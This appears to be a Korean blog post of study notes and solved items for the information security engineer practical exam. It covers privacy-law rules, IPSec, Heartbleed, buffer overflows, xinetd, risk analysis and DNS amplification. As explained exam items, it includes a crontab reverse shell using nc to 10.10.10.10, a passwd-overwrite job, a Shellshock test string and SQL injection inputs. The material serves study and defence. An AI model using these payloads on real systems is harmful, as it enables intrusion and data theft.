반응형
내부 관리계획
1. 개인정보관리책임자의 자격요건 및 지정에 관한 사항
2. 개인정보관리책임자와 개인정보취급자의 역할 및 책임에 관한 사항
3. 개인정보의 기술적·관리적 보호조치 이행 여부의 내부 점검에 관한 사항
4. 개인정보 처리업무를 위탁하는 경우 수탁자에 대한 관리 및 감독에 관한 사항
5. 개인정보의 분실·도난·누출·변조·훼손 등이 발생한 경우의 대응절차 및 방법에 관한 사항
개인정보 유출 통지
-통지·신고
유출된 개인정보의 정보주체에게 지체없이 통지하여야 한다.
유출된 정보주체의 수가 1천명 이상인 경우 행정안전부 장관 또는 한국인터넷진흥원에 신고하여야 한다.
-통지 기한
개인정보의 분실·도난·유출 사실을 안 때부터 24시간 이내
통지 대상의 연락처를 알 수 없는 등의 부득이한 사유가 있는 경우 예외 조치 가능
대통령령에 따른다.
전국구 일간지 등에 개재하는 등 다른 조치를 취해야 한다.
-통지 항목 5가지
유출등이 된 개인정보 항목
유출등이 발생한 시점과 경위
이용자가 취할 수 있는 조치
정보통신서비스 제공자등의 대응 조치
이용자가 상담 등을 접수할 수 있는 부서 및 연락처
0 0 6 * * root /bin/cp /tmp/passwd1 /etc/passwd
0 0 12 * * root /usr/bin/nc 10.10.10.10 80 -e /bin/bash
1) 임의로 조작된 passwd 파일이 원래 passwd 파일을 덮어쓴다.
2) 10.10.10.10 호스트에 80포트로 연결한다. 리버스쉘의 위험이 있다.
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
1) 이 취약점의 이름은? 셸쇼크
2) 보기의 명령을 실행했을 때 취약점이 존재하는 경우와 존재하지 않는 경우의 결과를 설명하시오. 취약점이 있는 경우 vulnerable this is a test 라고 출력되고, 취약점이 없는 경우 this is a test라고만 출력된다.
3) 결과가 나오는 이유에 대해 설명하시오.
Bash쉘이 제공하는 함수 선언기능을 이용한 취약점이다. "() {"로 시작하는 함수 선언문 끝에 명령어를 삽입해 환경변수에 저장할 경우 삽입한 명령어까지 실행된다.
<정보보안기사-8회>
MySQL은 가장 대중적으로 사용되는 공개 소프트웨어 DBMS이다. MySQL 설정파일인 my.cnf에 이 옵션을 추가할 경우 외부 네트워크 사용자의 접근을 제한하고 로컬에서만 접근할 수 있게 된다. 이 옵션은 무엇인가? skip-networking
WEP 암호화 방식은 IEEE 802.11b 프로토콜에서 적용되기 시작하여 (RC4) 암호화 알고리즘을 사용한다.40비트 길이의 WEP 비밀키와 임의로 할당되는 24비트 ( IV(initialization Vector) ) 로 조합된 총 64비트의 키를 이용하여 (RC4) 알고리즘 암호화하는 방식이다.
(Set-UID) 권한이 부여된 파일을 실행하면 실행하는 동안 해당 파일의 소유자 권한으로 인식하다. (Set-GID) 권한은 실행하는 동안 해당 파일의 소유자 그룹 권한으로 인식한다.
(Sticky-Bit) 권한은 디렉터리에만 적용되는 권한으로, 이 권한이 적용된 디렉터리엔 일반 사용자들이 자유롭게 파일을 쓸수 있지만 자신이 생성한 파일이 아니면 수정 삭제가 불가능하다.
다음은 DNS에 관한 설명이다. 빈칸에 들어갈 용어를 적으시오.
DNS 서버는 상위 DNS 서버에 질의하는 부하를 줄이기 위해 (캐시)를 이용한다. 적절한 주기의 갱신이 이루어지도록 하기 위해 이러한 (캐시)엔 유효기간이 있는데 이를 (TTL)라 한다.
고유식별정보를 처리하는 개인정보처리자는 인터넷 홈페이지를 통해 고유식별정보가 유출·변조·훼손되지 않도록 ( 연 1회 이상 취약점 )을 점검하고 필요한 보완 조치를 하여야 한다.
전송 모드(Transport Mode)
-보호 범위
IP 패킷 전체를 보호하는 것이 아니라 IP 헤더를 제외한 IP 패킷의 페이로드(Payload)만을 보호
IP 헤더는 암호화하지 않으므로 트래픽 경로는 노출된다.
-보호 구간
일반적으로 종단 노드(End Node) 구간의 IP 패킷 보호를 위해 사용한다.
터널 모드(Tunneling Mode)
-보호 범위
IP 패킷 전체를 보호
암호화된 패킷에 IP 패킷에 IPSec 헤더를 추가하여 라우팅을 수행한다.
IPSec 헤더는 구간 간 이동에 대한 정보만 있으므로 종단 정보(출발지, 목적지)와 트래픽 경로는 보호된다.
-보호 구간
일반적으로 터널/보안 게이트웨이 구간 또는 종단 노드와 터널/보안 게이트웨이 구간의 IP 패킷 보호를 위해 사용한다.
1) 파일 업로드의 취약점 확인 방법은 무엇인가?
jsp, php, sh 등 실행 가능한 파일을 업로드하고 실행이 가능한지 확인한다.
2) 대응방법을 설명하시오.
확장자나 파일 헤더를 통해 이미지, 문서 등 정해진 파일만 올릴 수 있도록 하고 파일이 저장되는 디렉터리의 실행권한을 없앤다.
하트비트 (Heartbeat)
일종의 Echo Request/Echo Reply처럼 서버의 기동 여부를 진단하기 위한 프로토콜
특정 Echo Request를 보내고, 반환 받을 크기를 지정하면 해당 크기만큼 Echo Reply가 온다
하트블리드
• 1.01f 이전의 버전에서 발생한다.
• 하트비트(Heartbeat)라는 SSL/TLS 확장 프로토콜 동작 과정에서 발생한다.
- 반환 받을 크기 지정 시 보낸 메세지보다 훨씬 크게 지정(최대 64KB)하여 보낼 수 있는 취약점이 존재하였다.
- 1KB를 보내면서 64KB를 요청 할 경우 나머지 63KB는 메모리에 있는 임의 데이터가 보내진다.
- 위와 같은 동작을 반복하면 메모리상에 흐르는 임의 데이터를 지속적으로 탈취할 수 있다.
탐지
하트블리드 공격 시 하트비트 응답 패킷이 요청보다 응답이 비정상적으로 크게 나간다.
하트블리드 공격 시 SSL 서비스 포트로 |18 03 ??| 패턴의 데이터가 전송된다.
대응
- OpenSSL의 버전을 1.01g 이상으로 업그레이드한다.
- 서버측 SSL 비밀키가 유출되었을 가능성이 있으므로 SSL 서버 인증서를 재발급 한다.
- 시스템 이용자들의 비밀번호 유출되었을 가능성이 있으므로 변경을 안내한다.
ISMS 인증을 위해 정보보호정책을 수립하고 정책의 적용범위를 설정하였다. 정보보호정책이 공식문서로 인정 받기 위한 절차를 기술하시오.
1. 이해관련자 검토
2. 최고경영자(CEO) 승인
3. 모든 임직원 및 관련자에게 이해하기 쉬운 형태 전달(최신본 유지)
스택 버퍼 오버플로우 (Stack Buffer Overflow)
- 주로 SetUID가 설정된(루트 권한으로 실행되는) 프로그램들을 타겟으로 한다.
- 입력값에 수용 가능한 버퍼보다 큰 값을 입력하여 임의의 공격코드를 루트 권한으로 실행시킨다.
원리
- 프로그램에서 특정 함수를 실행시키면 스택에 이전 함수로 돌아가기 위한 주소가 기록된다. (함수에서 return이 호출되면 그 값과 함께 돌아갈 주소)
- 버퍼에 큰 값을 넣게 되면 이 스택 영역을 침범하게 된다.
- 리턴 주소가 들어갈 곳에 쉘코드나 다른 프로그램의 주소를 넣으면 그것이 실행되게 된다.
힙 버퍼 오버플로우 (Heap Buffer Overflow)
- 힙 데이터 영역에서 일어나는 버퍼 오버플로이다.
- 스택 오버플로우만큼 흔히 사용가능한 공격은 아니다.
- 동적 메모리 할당 연결(malloc 상위 수준 데이터)을 덮어씀으로써 프로그램 함수 포인터를 조작한다.
trustwave 사의 제품으로 아파치웹서버, IIS에서 사용가능 한 공개용 웹 어플리케이션 방화벽은 무엇인가? ModSecurity
단편화된 IP패킷이다. 각 숫자가 의미하는 바를 적으시오
41421:48@2960+
1) 41421 - id : 원본 IP 데이터그램
2) 48 - size : 단편화 크기
3) 2960 - offset : 현재 위치
정보통신망법령에 따라 법에서 허용한 경우 외엔 주민등록번호를 취급해선 안 된다. 다음 법률 조항의 빈칸에 들어갈 발을 적으시오.
정보통신서비스 제공자는 다음 각 호의 어느 하나에 해당하는 경우를 제외하고는 이용자의 주민등록번호를 수집·이용할 수 없다.
1. 제23조의3에 따라 ( 본인확인기관 )으로 지정받은 경우
2. 법령에서 이용자의 주민등록번호 수집·이용을 허용하는 경우
3. 영업상 목적을 위하여 이용자의 주민등록번호 수집·이용이 불가피한 정보통신서비스 제공자로서 방송통신위원회가 고시하는 경우
② 제1항제2호 또는 제3호에 따라 주민등록번호를 수집·이용할 수 있는 경우에도 이용자의 주민등록번호를 사용하지 아니하고 본인을 확인하는 방법(이하 ( 대체수단 )이라 한다)을 제공하여야 한다.
SSL/TLS를 이루는 세부 프로토콜 중 레코드 프로토콜은 메시지를 암호화 하여 통신을 수행하는 역할을 한다. 레코드 프로토콜은 상위계층 메시지를 (단편화), (압축), (MAC), (암호화)와 같은 처리과정을 거쳐 헤더를 붙인 후 하위계층으로 전달한다.
( 단 압 맥 암 )
정보보호시스템 공통평가기준에 있는 내용이다. 빈칸을 채우시오
(보호프로파일 PP)(이)라 함은 평가대상 범주를 위한 특정 소비자의 요구에 부합하는 구현에 독립적인 보안요구사항의 집합을 말한다.
(보안목표명세서 ST)(이)라 함은 식별된 평가대상의 평가를 위한 근거로 사용되는 보안요구사항과 구현 명세의 집합을 말한다. -특정 식별 된 평가 대상 ( TOE )
(평가보증등급 EAL)(이)라 함은 공통평가기준에서 미리 정의된 보증수준을 가지는 보증 컴포넌트로 이루어진 패키지를 말한다.
공인인증서의 효력 소멸
- 공인인증서의 유효기간이 경과한 경우
- 공인인증기관의 지정이 취소된 경우
- 공인인증서의 효력이 정지된 경우
- 공인인증서가 폐지된 경우
공인인증서의 폐지
- 가입자 또는 그 대리인이 공인인증서의 폐지를 신청한 경우
- 가입자가 부정한 방법으로 공인인증서를 발급받은 경우
- 가입자가 사망, 실종선고 또는 해산된 경우
- 가입자의 전자서명생성정보가 분실/훼손/도난/유출된 경우
리눅스 xinetd
- 주요 구성
/etc/xinetd : 메인 설정파일
/etc/xinetd.d : 슈퍼데몬에 의해 제어되는 서비스 파일이 위치하는 디렉터리
/etc/rc.d/init.d/xinetd : xinetd를 제어하는 데몬 스크립트. start, stop, restart 등 사용
- 주요 내용 샘플
defaults
{
# disabled =
log_type = SYSLOG daemon info
log_on_failure = HOST
log_on_success = PID HOST DURATION EXIT
cps = 50 10
instances = 50
per_source = 10
v6only = no
groups = yes
umask = 002
}
- 설정 항목
log_type
SYSLOG와 FILE 두 가지 설정이 가능하다.
로그 기록을 syslog에 위임 할지, 별도 파일로 지정할지 선택한다.
ex) log_type = FILE /var/logs/xinet.log
log_on_failure
접속 실패 시 기록될 속성값을 지정한다,
속성값 : HOST, USERID, ATTEMPT
ex) log_on_failure = HOST
log_on_success
접속 성공 시 기록될 속성값을 지정한다.
속성값 : PID, HOST, USERID, EXIT, DURATION, TRAFFIC
cps
초당 요청받는 수를 제한한다.
cps [초당 요청수] [제한시간(초)]
ex) cps 50 10 (초당 요청수가 50 이상이면 10초간 접속을 제한한다.)
instances
동시에 서비스할 수 있는 최대 개수를 지정한다.
ex)instances = 50
per_source
같은 IP주소로 접속할 수 있는 서비스 수를 지정한다.
ex) per_source = 5
only_from
서비스를 이용할 수 있는 원격 호스트를 설정한다.
ex) 192.168.10.10 192.168.10.11 192.168.20.*
enabled
사용 가능한 항목을 설정한다. disabled항목에서 yes라고 설정 되어 있어도 허용한다.
ex) enabled telnet ftp
no_access
서비스를 이용할 수 없는 원격 호스트의 주소를 지정한다.
only_from 과 주소 지정법은 동일하고 중복 설정된 경우에는 차단된다.
access_times
지정된 시간에만 서비스를 이용할 수 있게 한다.
nice
서버의 우선순위를 지정한다. -20 ~ 19 사이의 정수를 입력한다.
wait
서비스가 단일 스레드(thread)인지 다중 스레드인지 지정한다.
yes 인 경우에는 오직 하나의 서비스만 작동하게 되며, no 인 경우에는 다중 스레드로 동작한다.
다음은 유닉스(솔라리스) 커널 보안 설정에 관한 문제이다. 커널 컴파일 용도로 활용하는 아래 ndd 명령어와 관련된 공격명과 명령의 의미를 쓰시오.
(1) ndd -set /dev/ip ip_forward_directed_broadcasts 0
1) 스머프 공격에 대응하기 위한 커널 파라미터 설정
Directed broadcasts IP 패킷이 포워딩되는것을 허용하지 않는다
(2) ndd -set /dev/tcp tcp_conn_req_max_q0 1024
2) TCP Syn Flooding 공격에 대응하기 위한 파라미터 설정
TCP 연결요청대기큐(Backlog Queue)의 크기를 1024로 늘린다
아이피테이블 설정 1초에 10회 발생시 차단하는 iptables 방화벽 룰을 구성하고자 한다. 아래 빈칸에 들어갈 말은?
iptables -A Input -p tcp (--dport 80) -m limit (--limit 10/s ) (-j) Drop
<정보보안기사 6회>
SNMPv3 에선 msgSecurityParameters 보안설정을 통해 여러 취약점을 해소할 수 있다. 다음 각 옵션에 대한 보안기능을 기술하시오.
msgAuthoritativeEngineID (A) msgAuthoritativeEngineBoots (A) msgAuthoritativeEngineTime (A)
msgUserName (B) msgAuthenticationParameters (B)
msgPrivacyParameters (C)
다음은 아래 DNS 관련 로그에 나타난 이 공격을 막기 위한 라우터 ACL 설정 명령어이다. (A), (B)를 기술하시오. access-list 1 deny (udp) any any eq (53)
10-Feb-2016 13:21:41.757 queries: info: client 10.10.100.27#12451: view external: query: test.com IN ANY + (10.10.100.1)
유닉스 기반의 운영체제들은 root 계정으로 원격에서 접속하는 것을 제한할 수 있다. 다음 운영체제에서 root 원격 접속을 제한하기 위해 사용되는 설정 파일을 쓰시오.
1) Solaris /etc/default/login
2) Unix /etc/security/user
3) Linux /etc/securetty
위험 관리와 관련하여 보기에서 설명하는 용어를 쓰시오.
1)자산: 조직이 보호해야 할 대상으로 정보, 하드웨어, 소프트웨어, 시설 등을 말하며 관련 인력, 기업 이미지 등 무형의 것도 포함
2)취약점: 보호 대상에 대한 잠재적 속성이나 처한 환경으로, 관리적·기술적·물리적 약점
3)위협: 보호 대상에 손실을 초래할 수 있는 원치 않는 사건의 잠재적 원인이나 행위자
내부관리계획
개인정보처리자가 개인정보를 안전하게 관리하기 위하여 내부 의사결정 절차를 통하여 수립시행하는 내부기준을 말한다. 이 내부 계획에는 아래의 내용이 포함되어야 한다.
(정보통신망법)
1. 개인정보관리책임자의 자격요건 및 지정에 관한 사항
2. 개인정보관리책임자와 개인정보취급자의 역할 및 책임에 관한 사항
3. 개인정보의 기술적·관리적 보호조치 이행 여부의 내부 점검에 관한 사항
4. 개인정보 처리업무를 위탁하는 경우 수탁자에 대한 관리 및 감독에 관한 사항
5. 개인정보의 분실·도난·누출·변조·훼손 등이 발생한 경우의 대응절차 및 방법에 관한 사항
1) 정성적 위험분석 방법: 델파이법, 시나리오법, 순위결정법
2) 정량적 위험분석 방법: 몬테카를로 시뮬레이션, 의사결정 나무 분석, 과거자료 분석, 수학공식 접근, 확률분포법
위험분석 방법 중 복합적 접근 방법의 장점과 단점을 설명하시오
1) 장점 : 비용과 자원을 효율적으로 사용할 수 있음. 고위험 영역을 빠르게 식별이 가능
2) 단점 : 고위험 영역이 잘못 식별되었을 경우, 위험분석 비용이 낭비되거나 부적절하게 대응될 수 있음
DNS 증폭 공격(DNS Amplification DDoS Attack) 중 IP기반 공격에 대해 설명하고 IP기반 공격을 사용하는 이유와 사용하는 레코드 type을 기술하시오.
1) 주로 사용되는 IP 기반 공격과
2) 해당 공격기법을 이용하는 이유
3) 주로 사용하는 DNS 쿼리 타입과
4) 해당 타입을 사용하는 이유
1) IP 기반 DNS 증폭 공격기법 : IP Spoofing 을 사용하여 출발지(Source) IP를 공격하고자 하는 희생자(victim)서버의 IP로 위조한 후 다수의 DNS 질의를 수행한다
2) 공격기법 이유 : 공격자의 DNS 질의에 대한 응답 패킷을 IP Spoofing 된 희생자 서버가 수신하게되므로 서비스거부 공격 가능
3) DNS쿼리 타입 : ANY 혹은 TXT 레코드 타입
4) 해당 레코드 타입 사용 이유 : any 또는 txt type의 경우 요청하는 패킷의 크기와 응답 패킷 크기가 비대칭적으로 응답 패킷 사이즈가 크기 때문에 적은 컴퓨팅 리소스로 효율적인 공격이 가능
웹 서버에서 다음과 같은 SQL SELECT 문이 수행된다고 할 때 아래의 항목에 대해서 설명하시오.
SELECT password FROM user WHERE username='qfrankr'
1) 쿼리의 결과는 무엇인가? qfrankr 사용자에 대한 패스워드 정보를 확인한다.
2) 모든 사용자의 정보를 획득하기 위해 'qfrankr' 부분에 들어갈 예시를 작성하시오.
' or 'a'='a 또는 ' or '1'='1 등 조건절을 참으로 만드는 다양한 조건값이 가능.
3) 위 예시가 가능한 이유는 무엇인가? 조건절이 WHERE username='' or '1'='1'이 되므로 항상 결과가 참이 된다.
반응형
'정보보안기사, 정보보안산업기사' 카테고리의 다른 글
[정보보안기사/산업기사] 실기 문제풀이 총정리 요약본 1탄 (0) | 2021.06.27 |
---|---|
[정보보안기사/산업기사] 실기 문제풀이 및 총정리 요약본 4탄 (0) | 2021.06.18 |
[정보보안기사/산업기사] 실기 문제풀이 및 총정리 요약본 2탄 (0) | 2021.06.18 |
[정보보안기사/산업기사] 실기 문제풀이 및 총정리 요약본 1탄 (0) | 2021.06.18 |
[자격증] 제 16회 정보보안기사 필기 가답안 복구 (0) | 2020.11.08 |
댓글